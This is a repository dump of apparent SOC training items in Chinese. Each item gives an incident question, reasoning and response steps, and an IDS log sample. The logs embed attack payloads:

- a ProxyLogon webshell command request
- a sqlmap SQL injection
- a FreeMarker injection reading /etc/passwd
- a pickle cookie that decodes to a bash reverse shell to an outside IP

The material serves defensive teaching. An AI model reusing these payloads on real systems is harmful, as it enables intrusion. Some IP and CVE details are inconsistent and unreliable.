25 | | bt-003 | [后门木马-webshell-上传内存马通信](BT/bt-003-webshell_upload_memory_shell.yaml) | FOOL |
26 | | bt-004 | [后门木马-CobaltStrike Beacon HTTP上线](BT/bt-004-cobaltstrike_beacon_http.yaml) | FOOL |
27 | | bt-005 | [后门木马-冰蝎4.0 PHP Webshell通信](BT/bt-005-webshell_behinder_4_0.yaml) | FOOL |
28 |
29 | ### 🔧 黑客工具 (HT - Hacker Tool)
30 |
31 | | ID | 语料标题 | 贡献人 |
32 | |----|----------|--------|
33 | | ht-002 | [黑客工具-SMBExec远程执行工具](HT/ht-002-smbexec_remote_execution.yaml) | FOOL |
34 | | ht-003 | [黑客工具-毒刺pystinger隧道通信](HT/ht-003-pystinger_tunnel_communication.yaml) | FOOL |
35 | | ht-004 | [黑客工具-Metasploit远控Payload传输](HT/ht-004-metasploit_payload_transmission.yaml) | FOOL |
36 | | ht-005 | [黑客工具-neo-reGeorg加密隧道通信](HT/ht-005-neo_regeorg_tunnel_communication.yaml) | FOOL |
37 |
38 | ### 🌐 Web攻击 (WA - Web Attack)
39 |
40 | | ID | 语料标题 | 贡献人 |
41 | |----|----------|--------|
42 | | wa-001 | [Web攻击-SQL注入攻击](WA/wa-001-sql_injection_attack.yaml) | FOOL |
43 | | wa-002 | [Web攻击-Java FreeMarker模板注入](WA/wa-002-freemarker_template_injection.yaml) | FOOL |
44 | | wa-003 | [Web攻击-Python反序列化漏洞](WA/wa-003-python_unpickle_deserialization.yaml) | FOOL |
45 | | wa-004 | [Web攻击-反弹shell攻击](WA/wa-004-reverse_shell_attack.yaml) | FOOL |
46 |
47 | ### ⛏️ 挖矿相关 (MC - Mining/Cryptocurrency)
48 |
49 | | ID | 语料标题 | 贡献人 |
50 | |----|----------|--------|
51 | | mc-001 | [挖矿木马-挖矿木马外联通信](MC/mc-001-mining_trojan_communication.yaml) | FOOL |
52 |
53 | ### 🔓 漏洞利用 (VR - Vulnerability Response)
54 |
55 | | ID | 语料标题 | 贡献人 |
56 | |----|----------|--------|
57 | | vr-001 | [漏洞利用-Exchange ProxyLogon远程代码执行](VR/vr-001-exchange_proxylogon_cve_2021_27065.yaml) | FOOL |
58 |
59 | ### 📋 信息泄露 (IL - Information Leakage)
60 |
61 | | ID | 语料标题 | 贡献人 |
62 | |----|----------|--------|
63 | | il-001 | [信息泄露-github敏感信息泄露](IL/il-001-github_sensitive_information_leakage.yaml) | [@deepsec-top](https://github.com/deepsec-top) |
64 | | il-002 | [Web根目录文件遍历导致信息泄露,可下载/etc/passwd文件](IL/IL-002-web_root_directory_information_leakage.yaml) | [@wzfukui](https://github.com/wzfukui) |
65 |
66 | ### 🎣 钓鱼攻击 (FA - Fishing Attack)
67 |
68 | | ID | 语料标题 | 贡献人 |
69 | |----|----------|--------|
70 | | - | 暂无语料 | - |
71 |
72 | ---
73 |
74 | ## 📝 语料格式说明
75 |
76 | 每个语料文件都包含以下标准化字段:
77 |
78 | - **ID**: 唯一标识符(格式:类别前缀-序号)
79 | - **Category**: 语料分类
80 | - **Created_At**: 创建时间
81 | - **Contributors**: 贡献者列表
82 | - **Additional_Info**: 附加信息
83 | - **Title_CN**: 中文标题
84 | - **Title_EN**: 英文标题
85 | - **Question**: 安全事件场景描述
86 | - **Complex_CoT**: 复杂思维链推理过程
87 | - **Response**: 具体响应措施
88 | - **Log_Sample**: 相关日志样本
89 |
90 | ## 🔗 相关链接
91 |
92 | - [项目主页](../README.md)
93 | - [贡献指南](../docs/CONTRIBUTING.md)
94 | - [原始语料目录]()
95 | - [处理脚本目录](../scripts/)
96 |
97 | ---
98 |
99 | ## 👥 贡献者
100 |
101 | 感谢以下贡献者为本项目提供的语料:
102 |
103 | - **FOOL** - 主要贡献者,提供了大部分安全检测语料
104 | - **[@deepsec-top](https://github.com/deepsec-top)** - 提供GitHub信息泄露和SMBExec工具检测语料
105 | - **[@wzfukui](https://github.com/wzfukui)** - 提供Web目录遍历信息泄露语料
106 |
107 | *最后更新时间:2025-05-29*
--------------------------------------------------------------------------------
/raw_corpus/VR/vr-001-exchange_proxylogon_cve_2021_27065.yaml:
--------------------------------------------------------------------------------
1 | - ID: vr-001
2 | Category: 漏洞利用
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - Exchange ProxyLogon远程代码执行漏洞利用
8 | - CVE-2021-27065任意文件写入漏洞
9 | Title_CN: 漏洞利用-Exchange ProxyLogon远程代码执行
10 | Title_EN: vulnerability exploitation - exchange proxylogon rce
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:Microsoft Exchange Server环境,位于上海
14 | - 事件描述:攻击者尝试利用 CVE-2021-27065(Exchange ProxyLogon)漏洞,通过特制的HTTP GET请求访问已上传的WebShell脚本 /owa/auth/QzU2risf9yZ6NOv7cmVD.aspx
15 | - 上下文:请求中包含JScript代码用于远程执行 whoami 命令,最终响应中返回 nt authority\\system,说明攻击者已成功远程执行命令,并获得系统权限
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 确认 Exchange 服务器是否存在历史 ProxyLogon 相关补丁缺失或失效。
20 | 2. 分析 WebShell 文件 /owa/auth/QzU2risf9yZ6NOv7cmVD.aspx 是否仍然存在于服务器路径中。
21 | 3. 检查IIS日志中是否有多个来源对该路径的访问尝试,排查是否已有多个攻击阶段展开。
22 | 4. 分析攻击者通过 WebShell 执行的系统命令种类及频率,确认是否涉及权限提升或持久化操作。
23 | 5. 检查其他目录下是否有同类结构的WebShell(如auth/*.aspx)被植入。
24 | 6. 利用EDR回溯系统调用链,判断是否有通过WScript.Shell调用执行系统命令的进程活动。
25 | 7. 复查是否存在任何导出或敏感数据被访问的记录,评估潜在信息泄露风险。
26 |
27 | Response: |
28 | 1. 立即隔离受影响Exchange主机(192.168.152.61),中断外部访问流量。
29 | 2. 删除并备份 /owa/auth/QzU2risf9yZ6NOv7cmVD.aspx WebShell文件,提交样本分析。
30 | 3. 审核该主机的Exchange补丁版本与配置,全面修复ProxyLogon相关漏洞(包括 CVE-2021-26855、CVE-2021-27065)。
31 | 4. 回溯分析攻击时间点前后的日志,识别是否存在持久化机制或横向行为。
32 | 5. 利用威胁情报封禁111.20.16.11来源IP,检查是否命中已知攻击者活动轨迹。
33 | 6. 重新部署WAF与EDR策略,对疑似WebShell路径增加高优先级告警。
34 | 7. 建议对全网Exchange资产开展基线扫描和统一补丁加固。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "transProtocol": "TCP",
40 | "appProtocol": "http",
41 | "srcAddress": "111.20.16.11",
42 | "srcPort": "20079",
43 | "destAddress": "192.168.152.61",
44 | "destPort": "5678",
45 | "eventCount": "1",
46 | "srcGeoLongitude": "116.401159",
47 | "srcGeoLatitude": "39.902798",
48 | "direction": "10",
49 | "attackerAddress": "111.20.16.11",
50 | "victimAddress": "192.168.152.61",
51 | "attackDirection": "1",
52 | "attacker": ["111.20.16.11"],
53 | "victim": ["192.168.152.61"],
54 | "srcSecurityZone": "outer",
55 | "logType": "alert",
56 | "dataType": "ids",
57 | "dataSubType": "attackAlert",
58 | "catOutcome": "OK",
59 | "severity": "7",
60 | "startTime": "2025-04-08 23:17:50",
61 | "endTime": "2025-04-08 23:17:50",
62 | "deviceReceiptTime": "2025-04-08 23:17:50",
63 | "collectorReceiptTime": "2025-04-08 23:17:50",
64 | "ruleName": "Microsoft Exchange ProxyLogon任意文件写入漏洞(CVE-2021–27065)",
65 | "ruleType": "/WebAttack/CodeInjection",
66 | "alarmType": "WEB攻击->远程代码执行",
67 | "requestMethod": "GET",
68 | "requestUrlQuery": "/owa/auth/QzU2risf9yZ6NOv7cmVD.aspx",
69 | "requestUrl": "/owa/auth/QzU2risf9yZ6NOv7cmVD.aspx",
70 | "requestBody": "code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22whoami%22%29.StdOut.ReadAll%28%29%29%3B",
71 | "responseMsg": "nt authority\\system",
72 | "responseCode": "200",
73 | "destHostName": "211.136.166.51:5678",
74 | "name": "Microsoft Exchange ProxyLogon任意文件写入漏洞(CVE-2021–27065)",
75 | "cve": "CVE-202127065",
76 | "txId": "0",
77 | "confidence": "High",
78 | "httpVersion": "HTTP/1.1",
79 | "accessAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
80 | "attackStage": "1",
81 | "attackStatus": "1",
82 | "pcapRecord": "true",
83 | "tacticId": "TA0001",
84 | "techniquesId": "T1190",
85 | "message": "Microsoft Exchange ProxyLogon任意文件写入漏洞(CVE-2021–27065). 来源:111.20.16.11/20079, 目的:192.168.152.61/5678",
86 | "isAPT": "false",
87 | "killChain": "KC_Exploitation"
88 | }
89 | ```
--------------------------------------------------------------------------------
/raw_corpus/WA/wa-001-sql_injection_attack.yaml:
--------------------------------------------------------------------------------
1 | - ID: wa-001
2 | Category: Web攻击
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - SQL注入攻击检测
8 | - 典型的Web应用安全漏洞利用
9 | Title_CN: Web攻击-SQL注入攻击
10 | Title_EN: web attack - sql injection attack
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:Web应用服务器环境,提供HTTP服务
14 | - 事件描述:攻击者通过GET请求,试图利用SQL注入漏洞进行攻击。请求中包含了可疑的SQL代码片段,响应状态为200,表明请求成功
15 | - 上下文:该请求来源于 110.10.19.119,目标是 172.19.12.6,涉及到的协议为HTTP,请求路径为/search
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 确认目标Web应用是否存在SQL注入漏洞,特别是针对输入参数的过滤和验证。
20 | 2. 分析请求中包含的SQL代码,确认是否有恶意SQL查询被执行。
21 | 3. 检查目标服务器的访问日志,排查是否有其他异常请求或重复访问行为。
22 | 4. 评估攻击者是否通过该漏洞获得了敏感数据或执行了其他恶意操作。
23 | 5. 检查数据库的访问记录,确认是否存在异常的查询或数据泄露行为。
24 | 6. 复查是否存在任何敏感数据被访问或导出的记录,评估潜在信息泄露风险。
25 |
26 | Response: |
27 | 1. 立即隔离受影响的Web服务器(172.19.12.6),中断外部访问流量。
28 | 2. 审核该Web应用的SQL查询逻辑,全面修复SQL注入漏洞,更新到安全版本。
29 | 3. 分析响应内容及请求参数,确认是否有恶意代码被执行,必要时进行取证。
30 | 4. 回溯分析攻击时间点前后的日志,识别是否存在持久化机制或横向行为。
31 | 5. 利用威胁情报封禁110.10.19.119来源IP,检查是否命中已知攻击者活动轨迹。
32 | 6. 重新部署WAF与IDS策略,对疑似SQL注入攻击路径增加高优先级告警。
33 | 7. 建议对全网Web应用资产开展基线扫描和统一补丁加固,防止类似攻击再次发生。
34 |
35 | Log_Sample: |
36 | ```
37 | nsfocus,V1,alert,2027,SQL注入 sql_logic_simple,18612379,220512,1,Lvmeng,1744125502,10.11.0.87,681C-A3EB-95C2-E0E9,UTS,110.10.19.119,,20085,172.19.12.6,,5679,TCP,HTTP,www.ddd4.com,,GET,,200,R0VUIC9zZWFyY2g/a2V5d29yZD0lMjUzMSUyNTMxJTI1MjclMjUyOSUyNTI5JTI1MjAlMjU0MSUyNTRFJTI1NDQlMjUyMCUyNTM2JTI1MzclMjUzNiUyNTM3JTI1M0QlMjUzNiUyNTM3JTI1MzYlMjUzNyUyNTIzIEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KVXNlci1BZ2VudDogc3FsbWFwLzEuNi40I3N0YWJsZSAoaHR0cHM6Ly9zcWxtYXAub3JnKQ0KQ29va2llOiBQSFBTRVNTSUQ9OWthY2F0MmxodGNndHFudG5mZTJnaDVpbTENCkhvc3Q6IHd3dy5kZGQ0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=
38 | ```
--------------------------------------------------------------------------------
/raw_corpus/WA/wa-002-freemarker_template_injection.yaml:
--------------------------------------------------------------------------------
1 | - ID: wa-002
2 | Category: Web攻击
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - Java FreeMarker模板注入攻击检测
8 | - 远程代码执行漏洞利用
9 | Title_CN: Web攻击-Java FreeMarker模板注入
10 | Title_EN: web attack - java freemarker template injection
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:Web应用服务器环境,运行Solr服务
14 | - 事件描述:攻击者通过特制的HTTP GET请求,试图利用Java FreeMarker模板注入漏洞。请求中包含了恶意的参数,试图执行系统命令 cat /etc/passwd
15 | - 上下文:响应内容显示了敏感的系统文件 /etc/passwd 的内容,表明攻击者成功利用了该漏洞
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 确认目标Web应用是否存在Java FreeMarker模板注入漏洞,并检查相关配置。
20 | 2. 分析请求参数中是否包含恶意代码,确认是否有系统命令被执行。
21 | 3. 检查目标服务器的访问日志,排查是否有其他异常请求或重复访问行为。
22 | 4. 评估攻击者是否通过该漏洞获得了敏感数据或执行了其他恶意操作。
23 | 5. 检查服务器上是否有异常的进程或服务在运行,确认是否存在后门或持久化机制。
24 | 6. 复查是否存在任何敏感数据被访问或导出的记录,评估潜在信息泄露风险。
25 |
26 | Response: |
27 | 1. 立即隔离受影响的Web服务器(110.10.19.119),中断外部访问流量。
28 | 2. 审核该Web应用的配置,全面修复Java FreeMarker模板注入相关漏洞,更新到安全版本。
29 | 3. 分析响应内容及请求参数,确认是否有恶意代码被执行,必要时进行取证。
30 | 4. 回溯分析攻击时间点前后的日志,识别是否存在持久化机制或横向行为。
31 | 5. 利用威胁情报封禁10.11.0.87来源IP,检查是否命中已知攻击者活动轨迹。
32 | 6. 重新部署WAF与IDS策略,对疑似模板注入攻击路径增加高优先级告警。
33 | 7. 建议对全网Web应用资产开展基线扫描和统一补丁加固,防止类似攻击再次发生。
34 |
35 | Log_Sample: |
36 | ```
37 | {
38 | "log_type": "alert",
39 | "attack_type": "疑似请求参数中存在Java FreeMarker模板注入",
40 | "event_count": "1",
41 | "src_ip": "10.11.0.87",
42 | "src_mac": "681C-A3EB-95C2-E0E9",
43 | "dest_ip": "110.10.19.119",
44 | "src_port": "20104",
45 | "dest_ip_2": "172.19.12.6",
46 | "dest_port": "5678",
47 | "transport_protocol": "TCP",
48 | "application_protocol": "HTTP",
49 | "target_domain": "211.136.166.51:5678",
50 | "request_method": "GET",
51 | "response_status_code": "200",
52 | "request_header": "GET /catalog-portal/ui/oauth/verify?error=&deviceUuid=$%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1",
53 | "response_info": {
54 | "streams": [
55 | {
56 | "stream": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsolr:x:8983:8983::/home/solr:"
57 | }
58 | ]
59 | }
60 | }
61 | ```
--------------------------------------------------------------------------------
/raw_corpus/WA/wa-003-python_unpickle_deserialization.yaml:
--------------------------------------------------------------------------------
1 | - ID: wa-003
2 | Category: Web攻击
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - Python unpickle反序列化漏洞攻击检测
8 | - 远程代码执行漏洞利用
9 | Title_CN: Web攻击-Python反序列化漏洞
10 | Title_EN: web attack - python unpickle deserialization
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:Web应用服务器环境,运行Python Web应用
14 | - 事件描述:攻击者尝试利用 Python-unpickle 反序列化漏洞,通过特制的HTTP GET请求访问目标服务器根目录。请求中包含了一个经过编码的Cookie,可能用于触发反序列化攻击
15 | - 上下文:响应状态为200,表明请求成功,但并未显示任何异常信息,表明攻击者可能已经成功执行了恶意代码
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 确认目标Web应用是否存在Python-unpickle反序列化漏洞,并检查相关依赖库的版本。
20 | 2. 分析请求中Cookie的内容,确认是否包含恶意负载或敏感信息。
21 | 3. 检查目标服务器的访问日志,排查是否有其他异常请求或重复访问行为。
22 | 4. 评估攻击者是否通过该漏洞获得了敏感数据或执行了其他恶意操作。
23 | 5. 检查服务器上是否有异常的进程或服务在运行,确认是否存在后门或持久化机制。
24 | 6. 利用EDR回溯相关时间段的系统调用,判断是否有异常的反序列化操作。
25 | 7. 复查是否存在任何敏感数据被访问或导出的记录,评估潜在信息泄露风险。
26 |
27 | Response: |
28 | 1. 立即隔离受影响的Web服务器(172.19.12.6),中断外部访问流量。
29 | 2. 审核该Web应用的依赖库,全面修复Python-unpickle相关漏洞,更新到安全版本。
30 | 3. 分析响应内容及请求参数,确认是否有恶意代码被执行,必要时进行取证。
31 | 4. 回溯分析攻击时间点前后的日志,识别是否存在持久化机制或横向行为。
32 | 5. 利用威胁情报封禁111.20.16.11来源IP,检查是否命中已知攻击者活动轨迹。
33 | 6. 重新部署WAF与IDS策略,对疑似反序列化攻击路径增加高优先级告警。
34 | 7. 建议对全网Web应用资产开展基线扫描和统一补丁加固,防止类似攻击再次发生。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "trans_protocol": "TCP",
40 | "app_protocol": "http",
41 | "src_address": "111.20.16.11",
42 | "src_port": "20091",
43 | "dest_address": "172.19.12.6",
44 | "dest_port": "5679",
45 | "event_count": "1",
46 | "src_geo_country": "中国",
47 | "dest_geo_country": "中国",
48 | "dest_geo_region": "上海",
49 | "dest_geo_city": "上海",
50 | "direction": "10",
51 | "attacker_address": "111.20.16.11",
52 | "victim_address": "172.19.12.6",
53 | "attack_direction": "1",
54 | "attacker": ["111.20.16.11"],
55 | "victim": ["172.19.12.6"],
56 | "src_security_zone": "outer",
57 | "log_type": "alert",
58 | "data_type": "ids",
59 | "data_sub_type": "attackAlert",
60 | "cat_outcome": "OK",
61 | "cat_technique": "/Exploit/Vulnerability/CodeInjection",
62 | "severity": "7",
63 | "start_time": "2025-04-08 22:21:29",
64 | "end_time": "2025-04-08 22:21:29",
65 | "device_receipt_time": "2025-04-08 22:21:29",
66 | "collector_receipt_time": "2025-04-08 22:21:29",
67 | "rule_name": "Python-unpickle反序列化漏洞",
68 | "rule_type": "/WebAttack/CodeInjection",
69 | "alarm_type": "WEB攻击->远程代码执行",
70 | "request_method": "GET",
71 | "request_url_query": "/",
72 | "request_url": "/",
73 | "request_header": "GET / HTTP/1.1
Host: 42.193.36.75:8000
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: user=gASV/gAAAAAAAACMAm9zlIwGc3lzdGVtlJOUjOZweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCI0Mi4xOTMuMzYuNzUiLDk5OTkpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9iYXNoIiwiLWkiXSk7J5SFlFKULg==",
74 | "response_header": "HTTP/1.1 200 OK
Server: gunicorn
Date: Thu, 03 Nov 2022 06:57:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11",
75 | "response_msg": "Hello Guest",
76 | "response_code": "200",
77 | "dest_host_name": "42.193.36.75:8000",
78 | "name": "Python-unpickle反序列化漏洞",
79 | "tx_id": "0",
80 | "confidence": "High",
81 | "http_version": "HTTP/1.1",
82 | "access_agent": "python-requests/2.20.0",
83 | "attack_stage": "1",
84 | "attack_status": "1",
85 | "pcap_record": "true",
86 | "tactic_id": "TA0001",
87 | "techniques_id": "T1190",
88 | "message": "Python-unpickle反序列化漏洞. 来源:111.20.16.11/20091, 目的:172.19.12.6/5679",
89 | "is_apt": "false",
90 | "kill_chain": "KC_Exploitation,KC_CommandControl"
91 | }
92 | ```
--------------------------------------------------------------------------------
/raw_corpus/WA/wa-004-reverse_shell_attack.yaml:
--------------------------------------------------------------------------------
1 | - ID: wa-004
2 | Category: Web攻击
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - 反弹shell攻击检测
8 | - 远程命令执行攻击
9 | Title_CN: Web攻击-反弹shell攻击
10 | Title_EN: web attack - reverse shell attack
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:阿里云门户网站环境
14 | - 事件描述:检测到反弹shell攻击,攻击IP为123.123.54.12,目标主机为21.13.5.61
15 | - 上下文:攻击结果显示服务器响应状态码200,返回包包含 /etc/passwd 内容,确认命令执行成功
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 检查攻击 IP 在 NTA 日志中的行为轨迹,判断是否存在横向移动或持久化攻击。
20 | 2. 查询攻击 IP 的 WHOIS 信息及 IP 信誉库,确认是否为已知威胁源。
21 | 3. 核查服务器是否存在残留攻击痕迹(如上传文件、计划任务、异常远程连接)。
22 | 4. 分析同类接口(含 "deviceUdid" 参数)是否存在统一漏洞入口。
23 |
24 | Response: |
25 | 1. 临时隔离受影响主机 21.13.5.61,阻断攻击者后续操作。
26 | 2. 封禁攻击 IP 123.123.54.12,并在 WAF 中设置策略拦截该类访问行为。
27 | 3. 回溯攻击路径 /catalog-portal/ui/oauth/verify 的所有请求,排查批量利用迹象。
28 | 4. 检查服务器日志中状态码 200 且返回包超长的请求,识别敏感文件泄露情况。
29 | 5. 扫描系统日志和应用日志,检测命令执行痕迹及后门文件(如 /bin/sh、/etc/crontab)。
30 | 6. 使用文件完整性工具(如 Tripwire)核查系统关键文件是否被篡改。
31 | 7. 组织开发团队加固 URL 参数解析逻辑,避免 EL/SpEL 注入漏洞。
32 | 8. 排查其他系统中同类框架及漏洞版本组件,避免横向攻击。
33 | 9. 启动漏洞通报机制,纳入安全闭环管理,记录漏洞修复进度。
34 |
35 | Log_Sample: |
36 | ```
37 | nsfocus,V1,alert,2099,Linux信息收集命令执行成功,25752,220952,1,Lvmeng,1744125725,10.11.0.87,681C-A3EB-95C2-E0E9,UTS,101.200.160.124,,20104,10.9.152.61,,5678,TCP,HTTP,211.136.166.51:5678,,GET,,200,R0VUIC9jYXRhbG9nLXBvcnRhbC91aS9vYXV0aC92ZXJpZnk/ZXJyb3I9JmRldmljZVVkaWQ9JTI0JTdiJTIyJTY2JTcyJTY1JTY1JTZkJTYxJTcyJTZiJTY1JTcyJTJlJTc0JTY1JTZkJTcwJTZjJTYxJTc0JTY1JTJlJTc1JTc0JTY5JTZjJTY5JTc0JTc5JTJlJTQ1JTc4JTY1JTYzJTc1JTc0JTY1JTIyJTNmJTZlJTY1JTc3JTI4JTI5JTI4JTIyJTYzJTYxJTc0JTIwJTJmJTY1JTc0JTYzJTJmJTcwJTYxJTczJTczJTc3JTY0JTIyJTI5JTdkIEhUVFAvMS4x
38 | ```
--------------------------------------------------------------------------------